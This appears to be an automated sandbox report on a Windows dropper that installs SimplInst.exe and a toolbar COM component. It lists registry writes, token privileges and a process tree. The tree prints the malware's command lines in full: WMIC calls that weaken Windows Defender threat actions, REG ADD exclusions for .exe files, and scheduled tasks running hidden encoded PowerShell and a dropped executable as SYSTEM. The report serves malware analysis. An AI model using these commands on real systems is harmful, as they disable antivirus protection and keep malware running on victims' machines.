Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tgZBuA7n.dll"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS\ = "0"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IyFOGQOPsSrjKINQhDMF"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\ = "{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	ANjRVCE.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	ANjRVCE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS\ = "0"	ANjRVCE.exe

Suspicious behavior: EnumeratesProcesses 44 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exeANjRVCE.exepowershell.exepowershell.exepowershell.exe

pid	process
576	powershell.exe
576	powershell.exe
972	powershell.exe
972	powershell.exe
1668	powershell.EXE
740	powershell.exe
740	powershell.exe
1288	powershell.exe
1288	powershell.exe
300	powershell.exe
300	powershell.exe
1956	powershell.exe
1956	powershell.exe
360	powershell.EXE
1384	powershell.exe
1384	powershell.exe
596	powershell.exe
596	powershell.exe
1340	powershell.exe
1340	powershell.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
2016	ANjRVCE.exe
1008	powershell.exe
1008	powershell.exe
1936	powershell.exe
1936	powershell.exe
1536	powershell.exe
1536	powershell.exe
2016	ANjRVCE.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exepowershell.EXEpowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	576	powershell.exe
Token: SeIncreaseQuotaPrivilege	748	WMIC.exe
Token: SeSecurityPrivilege	748	WMIC.exe
Token: SeTakeOwnershipPrivilege	748	WMIC.exe
Token: SeLoadDriverPrivilege	748	WMIC.exe
Token: SeSystemProfilePrivilege	748	WMIC.exe
Token: SeSystemtimePrivilege	748	WMIC.exe
Token: SeProfSingleProcessPrivilege	748	WMIC.exe
Token: SeIncBasePriorityPrivilege	748	WMIC.exe
Token: SeCreatePagefilePrivilege	748	WMIC.exe
Token: SeBackupPrivilege	748	WMIC.exe
Token: SeRestorePrivilege	748	WMIC.exe
Token: SeShutdownPrivilege	748	WMIC.exe
Token: SeDebugPrivilege	748	WMIC.exe
Token: SeSystemEnvironmentPrivilege	748	WMIC.exe
Token: SeRemoteShutdownPrivilege	748	WMIC.exe
Token: SeUndockPrivilege	748	WMIC.exe
Token: SeManageVolumePrivilege	748	WMIC.exe
Token: 33	748	WMIC.exe
Token: 34	748	WMIC.exe
Token: 35	748	WMIC.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeIncreaseQuotaPrivilege	644	WMIC.exe
Token: SeSecurityPrivilege	644	WMIC.exe
Token: SeTakeOwnershipPrivilege	644	WMIC.exe
Token: SeLoadDriverPrivilege	644	WMIC.exe
Token: SeSystemProfilePrivilege	644	WMIC.exe
Token: SeSystemtimePrivilege	644	WMIC.exe
Token: SeProfSingleProcessPrivilege	644	WMIC.exe
Token: SeIncBasePriorityPrivilege	644	WMIC.exe
Token: SeCreatePagefilePrivilege	644	WMIC.exe
Token: SeBackupPrivilege	644	WMIC.exe
Token: SeRestorePrivilege	644	WMIC.exe
Token: SeShutdownPrivilege	644	WMIC.exe
Token: SeDebugPrivilege	644	WMIC.exe
Token: SeSystemEnvironmentPrivilege	644	WMIC.exe
Token: SeRemoteShutdownPrivilege	644	WMIC.exe
Token: SeUndockPrivilege	644	WMIC.exe
Token: SeManageVolumePrivilege	644	WMIC.exe
Token: 33	644	WMIC.exe
Token: 34	644	WMIC.exe
Token: 35	644	WMIC.exe
Token: SeDebugPrivilege	1668	powershell.EXE
Token: SeDebugPrivilege	740	powershell.exe
Token: SeIncreaseQuotaPrivilege	892	WMIC.exe
Token: SeSecurityPrivilege	892	WMIC.exe
Token: SeTakeOwnershipPrivilege	892	WMIC.exe
Token: SeLoadDriverPrivilege	892	WMIC.exe
Token: SeSystemProfilePrivilege	892	WMIC.exe
Token: SeSystemtimePrivilege	892	WMIC.exe
Token: SeProfSingleProcessPrivilege	892	WMIC.exe
Token: SeIncBasePriorityPrivilege	892	WMIC.exe
Token: SeCreatePagefilePrivilege	892	WMIC.exe
Token: SeBackupPrivilege	892	WMIC.exe
Token: SeRestorePrivilege	892	WMIC.exe
Token: SeShutdownPrivilege	892	WMIC.exe
Token: SeDebugPrivilege	892	WMIC.exe
Token: SeSystemEnvironmentPrivilege	892	WMIC.exe
Token: SeRemoteShutdownPrivilege	892	WMIC.exe
Token: SeUndockPrivilege	892	WMIC.exe
Token: SeManageVolumePrivilege	892	WMIC.exe
Token: 33	892	WMIC.exe
Token: 34	892	WMIC.exe
Token: 35	892	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d0a450955b5c37142aa1fca3f2631a77.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exeforfiles.execmd.exe

description	pid	process	target process
PID 1940 wrote to memory of 1180	1940	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 1940 wrote to memory of 1180	1940	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 1940 wrote to memory of 1180	1940	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 1940 wrote to memory of 1180	1940	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 1940 wrote to memory of 1180	1940	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 1940 wrote to memory of 1180	1940	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 1940 wrote to memory of 1180	1940	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 1180 wrote to memory of 1472	1180	SimplInst.exe	SimplInst.exe
PID 1180 wrote to memory of 1472	1180	SimplInst.exe	SimplInst.exe
PID 1180 wrote to memory of 1472	1180	SimplInst.exe	SimplInst.exe
PID 1180 wrote to memory of 1472	1180	SimplInst.exe	SimplInst.exe
PID 1180 wrote to memory of 1472	1180	SimplInst.exe	SimplInst.exe
PID 1180 wrote to memory of 1472	1180	SimplInst.exe	SimplInst.exe
PID 1180 wrote to memory of 1472	1180	SimplInst.exe	SimplInst.exe
PID 1472 wrote to memory of 596	1472	SimplInst.exe	cmd.exe
PID 1472 wrote to memory of 596	1472	SimplInst.exe	cmd.exe
PID 1472 wrote to memory of 596	1472	SimplInst.exe	cmd.exe
PID 1472 wrote to memory of 596	1472	SimplInst.exe	cmd.exe
PID 1472 wrote to memory of 596	1472	SimplInst.exe	cmd.exe
PID 1472 wrote to memory of 596	1472	SimplInst.exe	cmd.exe
PID 1472 wrote to memory of 596	1472	SimplInst.exe	cmd.exe
PID 596 wrote to memory of 564	596	cmd.exe	forfiles.exe
PID 596 wrote to memory of 564	596	cmd.exe	forfiles.exe
PID 596 wrote to memory of 564	596	cmd.exe	forfiles.exe
PID 596 wrote to memory of 564	596	cmd.exe	forfiles.exe
PID 596 wrote to memory of 564	596	cmd.exe	forfiles.exe
PID 596 wrote to memory of 564	596	cmd.exe	forfiles.exe
PID 596 wrote to memory of 564	596	cmd.exe	forfiles.exe
PID 564 wrote to memory of 336	564	forfiles.exe	cmd.exe
PID 564 wrote to memory of 336	564	forfiles.exe	cmd.exe
PID 564 wrote to memory of 336	564	forfiles.exe	cmd.exe
PID 564 wrote to memory of 336	564	forfiles.exe	cmd.exe
PID 564 wrote to memory of 336	564	forfiles.exe	cmd.exe
PID 564 wrote to memory of 336	564	forfiles.exe	cmd.exe
PID 564 wrote to memory of 336	564	forfiles.exe	cmd.exe
PID 336 wrote to memory of 576	336	cmd.exe	powershell.exe
PID 336 wrote to memory of 576	336	cmd.exe	powershell.exe
PID 336 wrote to memory of 576	336	cmd.exe	powershell.exe
PID 336 wrote to memory of 576	336	cmd.exe	powershell.exe
PID 336 wrote to memory of 576	336	cmd.exe	powershell.exe
PID 336 wrote to memory of 576	336	cmd.exe	powershell.exe
PID 336 wrote to memory of 576	336	cmd.exe	powershell.exe
PID 1472 wrote to memory of 1664	1472	SimplInst.exe	forfiles.exe
PID 1472 wrote to memory of 1664	1472	SimplInst.exe	forfiles.exe
PID 1472 wrote to memory of 1664	1472	SimplInst.exe	forfiles.exe
PID 1472 wrote to memory of 1664	1472	SimplInst.exe	forfiles.exe
PID 1472 wrote to memory of 1664	1472	SimplInst.exe	forfiles.exe
PID 1472 wrote to memory of 1664	1472	SimplInst.exe	forfiles.exe
PID 1472 wrote to memory of 1664	1472	SimplInst.exe	forfiles.exe
PID 1664 wrote to memory of 1692	1664	forfiles.exe	cmd.exe
PID 1664 wrote to memory of 1692	1664	forfiles.exe	cmd.exe
PID 1664 wrote to memory of 1692	1664	forfiles.exe	cmd.exe
PID 1664 wrote to memory of 1692	1664	forfiles.exe	cmd.exe
PID 1664 wrote to memory of 1692	1664	forfiles.exe	cmd.exe
PID 1664 wrote to memory of 1692	1664	forfiles.exe	cmd.exe
PID 1664 wrote to memory of 1692	1664	forfiles.exe	cmd.exe
PID 1692 wrote to memory of 1144	1692	cmd.exe	reg.exe
PID 1692 wrote to memory of 1144	1692	cmd.exe	reg.exe
PID 1692 wrote to memory of 1144	1692	cmd.exe	reg.exe
PID 1692 wrote to memory of 1144	1692	cmd.exe	reg.exe
PID 1692 wrote to memory of 1144	1692	cmd.exe	reg.exe
PID 1692 wrote to memory of 1144	1692	cmd.exe	reg.exe
PID 1692 wrote to memory of 1144	1692	cmd.exe	reg.exe
PID 1692 wrote to memory of 740	1692	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\d0a450955b5c37142aa1fca3f2631a77.exe
"C:\Users\Admin\AppData\Local\Temp\d0a450955b5c37142aa1fca3f2631a77.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1940

C:\Users\Admin\AppData\Local\Temp\7zSCE18.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1180

C:\Users\Admin\AppData\Local\Temp\7zSCF60.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:596

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:564

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:1796

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:972

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:644

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
PID:1604

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:740

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:892

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:1664

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1692

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1144

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:740

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gUvyqxfFY" /SC once /ST 01:46:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:1196

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gUvyqxfFY"
4⤵
PID:300

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gUvyqxfFY"
4⤵
PID:932

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqZkKdgiyjBiVwZYfn" /SC once /ST 08:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\JwfUiAy.exe\" nv /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1352

C:\Windows\system32\taskeng.exe
taskeng.exe {0796F3F4-118C-4E7B-9C64-B5EFA3A32EC3} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:360

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:1936

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\uCtPhHkH\BfmLoNG.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\uCtPhHkH\BfmLoNG.exe en /S
2⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
PID:1996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
3⤵
PID:1320

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
4⤵
PID:1744

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
PID:892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:1008

C:\Windows\SysWOW64\Wbem\WMIC.exe
